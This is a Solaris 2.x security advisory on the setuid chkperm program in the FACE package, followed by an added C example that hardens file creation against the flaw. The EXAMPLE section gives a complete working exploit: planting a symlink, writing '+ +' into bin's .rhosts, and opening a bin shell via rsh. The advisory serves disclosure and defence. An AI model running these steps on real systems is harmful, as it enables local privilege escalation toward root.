Solaris 2.x Vulnerability [/usr/vmsys/bin/chkperm]

Problem:  Vulnerabilities in /usr/vmsys/bin/chkperm
Platform: Solaris 2.4, 2.5, 2.5.1, other System V derived systems with the
          FACE package installed
Impact:   Local users can overwrite bin owned files with zero length files.
          Local users can create world writable bin owned files.
          Account bin can be compromised.
Solution: Remove the suid/sgid bit from the program until a patch is available

------------------------------------------------------------------------

PROBLEM DESCRIPTION

Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package called
FACE (Framed Access Command Environment) installed. Included in the package
is a program called chkperm, which checks a file to see whether the user has
permission to use the FACE interface. This program is installed suid and sgid
bin, and is trivially exploitable to compromise the bin account. And in
Solaris, which installs many/most of the system binaries as bin, it may be
said that "binliness is next to rootliness."

The FACE package comes from System V, and may be available under other SYSV
based systems. We welcome reports of other vulnerable systems.

This vulnerability is believed to be known to the intruder community.

------------------------------------------------------------------------

PLATFORMS AFFECTED

Solaris 2.x, possibly other SYSVR4 derived systems. We welcome reports of
other vulnerable systems.
------------------------------------------------------------------------

IMPACT

Local user can gain system privileges as bin (root follows shortly)

------------------------------------------------------------------------

SUGGESTED WORKAROUND

    % chmod ug-s /usr/vmsys/bin/chkperm

------------------------------------------------------------------------

EXAMPLE

    % mkdir /tmp/foo
    % mkdir /tmp/foo/lib
    % chmod -R 777 /tmp/foo
    % setenv VMSYS /tmp/foo
    % umask 0000
    % ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
    % /usr/vmsys/bin/chkperm -l -u foo
    % ls -l /usr/bin/.rhosts
    -rw-rw-rw-   2 bin      bin            0 Nov 12 09:41 .rhosts
    % echo "+ +" >> /usr/bin/.rhosts
    % ls -l /usr/bin/.rhosts
    -rw-rw-rw-   2 bin      bin            4 Nov 12 09:41 .rhosts
    % rsh -l bin localhost /bin/csh -i
    Warning: no access to tty; thus no job control in this shell...
    % id
    uid=2(bin) gid=2(bin)

------------------------------------------------------------------------

DISCUSSION

The program (which resides at /usr/vmsys/bin/chkperm) does several things in
an insecure fashion:

1) It tries to open the file $VMSYS/.facerc and, if the file is not present,
   creates it with zero length and ownership bin.bin.

2) The user's UMASK is inherited, so permissions on the newly-created .facerc
   are under the control of an attacker.

3) VMSYS by default is set to /usr/lib, but the program cheerfully checks
   your environment for a different VMSYS base directory, and uses that.

4) There is no check made for symbolic links, avoiding the need to race.

This exploit is far from original, though it appears to be unpublished as
yet. Blindly following symlinks, following without checking for existence or
matching ownership, and inheriting the user's environment are examples of
very naive programming, wholly inappropriate for a program installed setuid
to a system account. Sun's practice of shipping their system binaries and
binary directories owned and writable by bin certainly contributes to making
this exposure more effective and dangerous.

Kevin Prigge
John Ladwig
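The four defects listed in the DISCUSSION are exactly what a setuid program must get right when it creates a file. The C below is an illustration added to this advisory, not the chkperm source: it shows a hardened version of the ".facerc create" step (fixed base directory instead of $VMSYS, O_CREAT|O_EXCL|O_NOFOLLOW so a symlink is refused rather than followed, explicit mode independent of the caller's umask, and an fstat check on the opened descriptor), plus a self-check that rebuilds the EXAMPLE's symlink-and-umask setup in a scratch directory under /tmp. The function names, the scratch directory and the "victim" file are made up for the illustration.

```c
#define _GNU_SOURCE 1   /* openat, symlinkat, mkdtemp, O_NOFOLLOW on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened version of the ".facerc create" step. dirfd comes from a fixed,
 * compiled-in base directory (never from $VMSYS). O_CREAT|O_EXCL|O_NOFOLLOW
 * makes an existing file or a planted symlink fail instead of being followed,
 * and a temporary umask forces mode 0600 whatever the caller's umask was. */
int create_private_file(int dirfd, const char *name) {
    mode_t old = umask(077);
    int fd = openat(dirfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    int saved = errno;
    umask(old);
    if (fd < 0) { errno = saved; return -1; }
    struct stat st;  /* verify what was actually opened, by descriptor, not path */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()
        || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd); errno = EPERM; return -1;
    }
    return fd;
}

/* Self-check that rebuilds the EXAMPLE's setup in a scratch directory: a link
 * named .facerc pointing at a constructed "victim" file, umask 0000. Returns 0
 * when the link is refused, the victim is untouched, and a new file is 0600. */
int self_check(void) {
    char dir[] = "/tmp/chkperm-demo-XXXXXX";   /* constructed scratch location */
    if (!mkdtemp(dir)) return 1;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0) return 2;
    int v = openat(dfd, "victim", O_WRONLY | O_CREAT, 0644);
    if (v < 0 || write(v, "data", 4) != 4 || close(v) != 0) return 3;
    if (symlinkat("victim", dfd, ".facerc") < 0) return 4;
    umask(0);                                   /* the attacker's umask 0000 */
    int rc = 0, fd; struct stat st;
    if (create_private_file(dfd, ".facerc") != -1) rc = 5;   /* must refuse */
    if (fstatat(dfd, "victim", &st, 0) < 0 || st.st_size != 4) rc = 6;
    fd = create_private_file(dfd, "facerc.new");
    if (fd < 0 || fstat(fd, &st) < 0 || (st.st_mode & 0777) != 0600) rc = 7;
    if (fd >= 0) close(fd);
    unlinkat(dfd, "facerc.new", 0); unlinkat(dfd, ".facerc", 0);
    unlinkat(dfd, "victim", 0); close(dfd); rmdir(dir);
    return rc;
}

int main(void) { int rc = self_check(); printf("self_check: %d\n", rc); return rc; }
```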